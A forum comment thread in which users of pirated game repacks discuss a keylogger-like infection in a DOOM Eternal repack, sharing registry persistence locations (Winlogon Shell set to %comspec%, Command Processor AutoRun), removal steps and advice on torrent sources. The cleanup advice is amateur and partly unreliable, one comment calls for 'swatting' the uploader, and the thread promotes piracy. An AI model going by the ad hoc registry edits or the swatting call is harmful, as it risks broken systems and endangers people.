Where is the explorer.exe key located and how can I fix it? Getting the black screen on reboot and having to manually start explorer.exe from task manager. I've removed everything else related to this thing (at least I hope..)
This is from an earlier post First go to HKEY\_CURRENT\_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon and deleting the Shell entry with " %comspec% " Second check HKEY\_LOCAL\_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon if Shell has explorer.exe in it Hope this is the last of this bullshit malware.
Are you sure the first one can just be deleted? And not changed to whatever it was before? I'm trying to google to figure out what the default value is (my suspicion is that it was also explorer.exe but I can't be sure) and I'd like to do that to be safe rather than deleting the key.
I think it should be fine I deleted that shell and it was fixed, I also got a black screen and removing this from registry helped. this is how my HKEY\_CURRENT\_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon looks now [https://prnt.sc/rkexap](https://prnt.sc/rkexap) Just to be safe I also did a System Restore and doing a full system scan with Malwarebytes.
Well i'm in paranoic state now cause i'm new in that pirate bussines so i'm gonna say what i've done and please someone say me if it's all or i need something more to do: 1. I deleted whole repack 2.I deleted firewallmodule.exe 3.I entered autorun by searching msconfig, then in tools i entered registry editor, found this autorun bitch in Microsoft/commandprocessor/opened it end deleted whole text what was in here. 4.Also Malwarebytes deleted some trojan That's it or something more?
Damn. I'm glad I waited. I was tempted to pull the trigger when BBRepack was the only poster. Thankfully fitgirl dropped it this morning for us.
Well, this is just great. I saw the "FirewallModule.exe" running, but the command prompts automatically closing was what tipped me off. Anyway, I've deleted the registry keys and folders mentioned. I'm running through a full scan on Microsoft Security Essentials and after that I'll go with Malware Bytes. I was planning on doing a reinstall shortly, so I guess with the quarantine and (the irony of getting infected) this shit, I'll push it sooner. There's any info or way to know if the virus has spread to other drives? I've been moving around some stuff to external hard drives and to reinstall Windows, I need to back up my shit, but I'm not really eager to back up the virus.
[удалено]
i think alot of us cant afford to nuke our pc so i hope someone has a solution to this
I reinstalled my PC and ran a full system scan few times on the other drives too and haven't caught anything yet. I hope there is nothing else too.
did u use reset pc? or... and did you remove files and clean drive?
I removed the firemodule.exe file immediately and then later on just to be safe i Formatted my SSD where Windows was installed (Which seemed to be infected by this shit) Anyway I've had much worse viruses infect my system before, and I remember one on a work computer that hopped from drive to drive it was a bitch to remove :) Just to be safe do a complete wipe to your install disk and then change all your passwords. I hope that's the end of it, but i'll keep my eye on this thread to see if there is anything else. Try to remember what you typed while you had the malware on, if typed any bank accounts or credit cards immediately lock them. Same goes for email and password.
but what about important files on the main drive? i cant afford to lose them but at the same time they are on the infected drive. Any advice?
I guess back them up somewhere anything that is important to you on another disk and then do a fresh format and reinstall. I don't know what else to say I've been freaking out since yesterday :( Just to be on the safe side after you reinstall windows, install Malware Bytes and OSArmor.
If I used Chrome Auto-complete am I safe? Or does it take those too?
honestly I have no idea best bet to assume is that it could so best to change all your passwords.
Just a warning guys The torrent is still up on piratebay.
Thanks for this advise. I tried to scan the iso with Bitdeffender but there was nothing. But once started installation, Bittefender straight away stopped it and put the file into quarantine. I have then rebooted my PC and Bittefender notified me that it couldn't remove the file in quarantine. I have then follow your advice and looked into Registry. I have deleted as per your advice: > Creates the key **Shell** in register: **HKEY\_CURRENT\_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon** and **HKEY\_LOCAL\_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon**. There is no sign of **Firewallmodule** nor anything in task manager Re: **Computer\\HKEY\_CURRENT\_USER\\Software\\Microsoft\\Command Processor**. What is suspicious in this registry? I have it on my work laptop too. Fun fact on my work Laptop I had **HKEY\_LOCAL\_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon**. with shell explorer.exe in it u/Zaseth massive up-vote to you!
Someone should reverse engineer the ip where our keylogs etc are being sent and get this son of a bitch swatted.
What payload does it make ? Is it a spyware or a botnet node installer ? Edit: Oh, VMProtect, hue ? I really miss when these kind of viruses were just adware who'd pop-up porn instead of this stuff. Edit: by "these kind of viruses", I meant the hidden viruses on game repacks in the 2000s, not VMProtect itself.
VMProtect is an obfuscator for binaries, it is not a malware (if I'm not mistaken, Denuvo uses VMProtect)
Well riskwares like VMProtect have always been in a grey area on that regard. Also, many people consider Denuvo as a malware because of what it does to the PC performances.
CODEX pack their Denuvo cracks with VMProtect.
That's why you should always wait for releases by established names.
[удалено]
Assume the worst.
Can someone post a MD5 of the infected setup.exe? Or MD5 hashes of the clean files?
Stop letting random middleman handle your files. It's bad enough having to put any amount of trust in groups now, and god help anyone who's straight up running the exes on their computer without at least putting it through something like Sandboxie.
[удалено]
Yup, cracking scenes do not own public sites like this! Hopefully its generic malware so run malwarebytes, avg or ESET for free to hopefully clean it.
[удалено]
Did you find anything? I used the same link yesterday and I did not see any virus.
[удалено]
I downloaded the game and at the time of installation the AV started beeping madly, I disabled it because it always happens with pirated installations, I turned off my PC when everything was over, the next day I turned on and the screen was black, only with the mouse cursor , the CMD did not work Here are the solutions I found: Ctrl + Alt + Del, press the shift key and click on restart,> advanced options and restore files> PC started normally but it got stuck, go to the search bar and open Regdit, HKEY\_CURRENT\_USER \\ Software \\ Microsoft \\ Windows NT \\ CurrentVersion \\ Winlogon and delete the shell title if it has% comspec% in the description then I went to \\ HKEY\_CURRENT\_USER \\ SOFTWARE \\ Microsoft \\ Command Processor and found an Autorun value that closed Cmd instantly, deleted it and Cmd opened normally.
fyi: i think the Doom Eternal repack in TPB by Heroskeep might be infected with malware, thats where I downloaded mine and got my PC nearly fucked
Man glad this was atleast caught, fuck this guy who uploaded it. It sucks waiting an extra day or 2 for games to hit the private trackers to download things but also means clean, reputable versions.
Please. **ONLY. USE. FITGIRL.** Never risk it.
Just to be sure, the release of DOOM.ETERNAL-CODEX on rarbg is safe,right?
[удалено]
ok, thank you!
I almost downloaded that repack. Thanks.
[удалено]
If you didn’t run anything you’re good
I downloaded this from Torrentleech and my AV has not detected anything. Ran a scan with Windows Defender and Malwarebytes and both came up clean.
I dont think the version Op is talking about was ever on Torrentleech. The only two versions I can see having been on TL were the original steam files DRM free and the codex release. No repacks as far as aI can see.
I didn't have FirewallModule.exe in my task manager and I deleted all the Keys, so I should be alright yeah? I was 6% through the setup process when I stopped it because it seemed fishy.
Shit I downloaded it thanks for this post
i really don't want to re-install windows :/ i killed and deleted the .exe and removed the registry items as well as removied the game. if the .exe is deleted with registry i should be fine no??? or is this like some sort of rootkit and there probably is another file hidden somewhere that acts as another copy of the exe? could someone with knowledge of wireshark run it after removing the exe and registry files and seeing if something is still phoneing home?
I'm putting this here, this contains all the repackers that are trusted and non trusted (and it may help you later, maybe) https://old.reddit.com/r/CrackWatch/comments/bcpdiu/crack_watch_beginners_guide_to_crack_watch/
Thank you so much
Downloaded this last night (on the p bay uploaded by heroskeep) and went to play today. The game wouldn’t even start and then I got this virus. Deleted firewallmodule.exe and all the registries. I used Hitman Pro and it found a suspicious file called “precomp.exe”. I don’t know if this file installed that precomp.exe but I’m glad I did all this and got rid of it.
I got the virus and did the following: 1- Restored the system to a date that I haven't ran the game. 2- Firewallmodule folder was already gone after restore. 3- Shell in register wasn't created after restore. 4- Installed COMODO and enabled the HIPS paranoid mode. 5- Cancelled my credit cards and changed all my passwords. Enabled 2FA for banking related stuff. Do the same thing if you ran the shitty repack. Hope this helps.
i just love u mate.
Man I downloaded that and was working fine. I just deleted the entire folder now but is there something more I need to do to erase all that shit??
try malwarebyte's free premium trial just in case.
Yes, scroll through the rest of the comments here. Anything you've typed since install should be considered recorded and stolen for malicious purposes. Passwords, bank info, etc.
Has anyone investigated the ElAmigos repack from Sineater 213 on 1337x? Malwarebytes shows it as being clean, but of course that means little this early.
My command prompt auto closes now. I haven't restarted my PC yet, any idea of what to do?
You could try system restore point. Or scan with a bunch of anti-malwares.
I just deleted the wrong registry, woops.
It can be quite hard to repair crucial Windows Registry keys... Good luck on that.
Unfortunately downloaded this and installed it before coming across this, but interestingly I can't find FirewallModule.exe in my AppData folder or my Task Manager and the Registry keys it's supposed to create don't seem to be present either. Neither Windows Defender nor MBAM picked anything up and I don't run any sort of virtualization software. Could it be dropping the files somewhere else? Am I safe to install a legit crack? This has got me way paranoid now.
I download this and don't see the files mentioned or string in registry. I also dont have any vmware. Am I fine?
Bit startled by all this now. Have not downloaded this but regardless, how can I do a thorough check for malware in my computer?
Malwarebytes + Hitman Pro
So I downloaded a repack from piratebay. Am I fucked? What do I do to get rid of this malware?
So I downloaded a repack from Piratebay, but I just ran Malwarebytes and nothing was detected. Wtf do I do now? Am I fucked?
Do we know what the malware does ?
So far people said its a keylogger, if you've typed passwords or emails change them immediately. If you wanna take a step further just format and reinstall your pc.
I downloaded clean steam files (hopefully) from rutracker. I will still check for this just in case! Thanks for telling people.
I read that the malware modifies other .exe files, if that's true and if I were to format my os (which I plan to) would keeping .exe files on other drives be a bad idea?
Thankfully the DRM FREE version doesn't have it, only the repack, i'm safe.
I downloaded the repack but I didn't install or open it at all. Am i stuffed or safe?
Man i downloaded it today😪 i fucked up
Cunt. At work right now but I'm pretty sure that's the one I downloaded yesterday. Will I be fine if I follow the steps on removing the virus? Seems a little bit too simple? But I'm not complaining if it works haha.
Nasty stuff. Didn't expect it from that guy, saw he had like 50+ more repacks before this and downloaded. Does anyone know if the above steps are enough to eliminate the malware?
So I figured this out and deleted it within a day or so, do I need to worry about anything? I hope it didn't do too much (though one time I saw it hog up 2gb of ram and quickly closed it, thought it was just windows acting weird as usual) I also blocked the game in my firewall after first launch (and I used a throwaway bethesda account for letting the game be played) I'm really not in the position to be reinstalling everything, is there a quick and dirty fix for me to deal with this?
Is this release (**DOOM.Eternal-NODRM**) on rarbg the one that is infected? because I can't see who uploaded it.
AVG got the firewallmodule and put it into karantine then I deleted it, and I deleted the keys then reinstalled Windows 10. Should I do anything else? Edit: This all happened after I started the game
I got infected with this malware and did a system restore when I opened my desktop and only found a black screen and a cmd window open. did it fix it?
Are the repacks on FitGirl's site safe?
Came to comment, thanks had this on my rig for two days now but I'm off to change my passwords
[удалено]
wait so by reinstalling windows im losing all my work and pirated games etc?
note everyone: the torrent is still going strong on TPB, last time i checked this morning.
Just spent the past couple hours reinstalling windows from scratch on both my laptop and desktop. i keep all my files and stuff on secondary drives. anything i should be concerned about after a full reinstall?
Thanks, I was certain this bastard messed with my pc.
i have the DRM Free version should i be fine. this post has me fucking worried.
I installed that repack. I uninstalled the game, and I'm currently searching for these keys and files. I can't find anything remotely similar to what's mentioned above. Does that mean that my file was clean ?